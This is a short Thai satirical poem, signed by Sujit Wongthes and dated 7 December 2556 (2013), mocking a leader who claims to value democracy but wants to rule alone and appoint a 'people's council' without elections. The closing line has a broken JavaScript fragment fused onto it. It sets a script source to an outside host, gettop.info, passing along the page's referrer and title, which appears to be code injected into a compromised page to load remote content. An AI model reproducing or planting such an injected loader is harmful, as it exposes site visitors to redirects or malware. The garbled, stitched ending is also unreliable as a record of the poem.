ประชาธิปไตยมีก็ดีอยู่

แต่ต้องยกตัวกูขึ้นเป็นใหญ่

เลือกตั้งไม่ต้องทำช้าร่ำไร

กูตั้งได้สภาประชาชน

 

สุจิตต์ วงษ์เทศ

บ้านช่างหล่อ กรุงธนบุรี

7 ธันวาคม 2556} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;